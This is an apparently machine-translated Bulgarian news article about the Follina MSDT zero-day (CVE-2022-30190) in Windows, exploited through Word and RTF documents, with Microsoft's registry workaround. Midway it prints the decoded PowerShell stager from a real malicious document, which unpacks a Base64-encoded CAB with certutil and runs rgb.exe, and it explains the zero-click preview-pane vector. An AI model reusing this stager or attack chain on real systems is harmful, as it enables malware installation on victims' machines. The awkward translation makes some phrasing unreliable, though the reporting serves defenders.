Изпълнението на код 0-ден в Windows е под активно експлоатиране от 7 седмици

Критично изпълнение на код нулев ден във всички поддържани версии на Windows е активно експлоатирано в продължение на седем седмици, което дава на нападателите надеждно средство за инсталиране на зловреден софтуер, без да задейства Windows Defender и списък от други продукти за защита на крайни точки.

Уязвимостта на инструмента за диагностика на поддръжката на Microsoft беше съобщена на Microsoft на 12 април като нулев ден, който вече беше експлоатиран в дивата природа, изследователи от Shadow Chaser Group казах На Twitter. А отговор от 21 априлобаче, информира изследователите, че екипът на Центъра за отговор на сигурността на Microsoft не счита докладваното поведение за уязвимост в сигурността, тъй като се предполага, че инструментът за диагностика на MSDT изисква парола, преди да изпълни полезни натоварвания.

Ъъъ, няма значение

В понеделник Microsoft обърна курса, идентифициране на поведението с проследяващия уязвимост CVE-2022-30190 и предупреждение за първи път че докладваното поведение все пак представлява критична уязвимост.

„Съществува уязвимост при отдалечено изпълнение на код, когато MSDT се извиква с помощта на URL протокола от извикващо приложение като Word“, се посочва в съвета. „Нападател, който успешно използва тази уязвимост, може да стартира произволен код с привилегиите на извикващото приложение. След това нападателят може да инсталира програми, да преглежда, променя или изтрива данни или да създава нови акаунти в контекста, разрешен от правата на потребителя.“

Към момента на публикуването на тази история Microsoft все още не е издала корекция. Вместо това той съветваше клиентите да деактивират MSDT URL протокола чрез:

  1. Бягай Командния ред като Администратор.
  2. За да архивирате ключа на системния регистър, изпълнете командата “reg export HKEY_CLASSES_ROOT ms-msdt име на файл
  3. Изпълнете командата “reg delete HKEY_CLASSES_ROOT ms-msdt / f”

Въпреки че първоначално е пропусната от Microsoft, уязвимостта отново е забелязана от изследовател идентифицира документ на Word качен във VirusTotal в петък, който използва неизвестния досега вектор на атака.

Според анализ на изследователя Кевин Бомонт, документът използва Word за извличане на HTML файл от отдалечен уеб сървър. След това документът използва URI схемата на MSProtocol за зареждане и изпълнение на команди на PowerShell.

„Това не би трябвало да е възможно“, пише Бомонт.

За съжаление, то е възможен.

Когато командите в документа се декодират, те се превеждат на:

$cmd = "c:windowssystem32cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:userspublic&&for /r
%temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

Според изследователя Джон Хамънд от охранителна фирма Huntressскриптът:

  • Стартира скрити прозорци за:
    • Убийте msdt.exe, ако работи
    • Прегледайте файлове в RAR файл, търсейки низ Base64 за кодиран CAB файл
      • Съхранявайте този кодиран в Base64 CAB файл като 1.т
      • Декодирайте кодирания в Base64 CAB файл, който да бъде запазен като 1.в
      • Разширете 1.в CAB файл в текущата директория и накрая:
      • Изпълни rgb.exe (вероятно компресиран във файла 1.c CAB)

Бомонт също обърна внимание на тази академична работа, който през август 2020 г. показа как се използва MSDT за изпълнение на код. Това предполага, че е имало поне още един път, когато екипът по сигурността на компанията не е успял да схване потенциала това поведение да бъде злонамерено експлоатирано.

Не, защитеният изглед няма да ви спаси

Обикновено Word е настроен да зарежда съдържание, изтеглено от интернет, така, както е известно защитен изглед, режим, който деактивира макроси и други потенциално вредни функции. По причини, които не са ясни, каза Бомонт, ако документът е зареден като файл с богат текстов формат, той „работи без дори да отваря документа (чрез раздела за визуализация в Explorer), да не говорим за защитен изглед.

С други думи, пишат изследователите на Huntress, RTF файлът може да „задейства извикването на този експлойт само с прозореца за преглед в Windows Explorer“. По този начин „това разширява тежестта на тази заплаха, като не просто „едно щракване“ за експлоатиране, но потенциално със задействане „нулево щракване““.

Освен документа, качен във VirusTotal в петък, изследователите разкриха a отделен файл на Word качен на 12 април, който използва същия нулев ден.

Като се има предвид тежестта на тази непоправена уязвимост, организациите, които разчитат на Microsoft Office, трябва задълбочено да проучат как тя се отразява на техните мрежи. Деактивирането на MSDT URL протокола няма вероятност да създаде големи смущения в краткосрочен и вероятно в дългосрочен план. Докато разследват – поне докато Microsoft не пусне повече подробности и насоки – потребителите на Office трябва да изключат изцяло протокола и да дадат допълнителна проверка на всички документи, изтеглени през Интернет.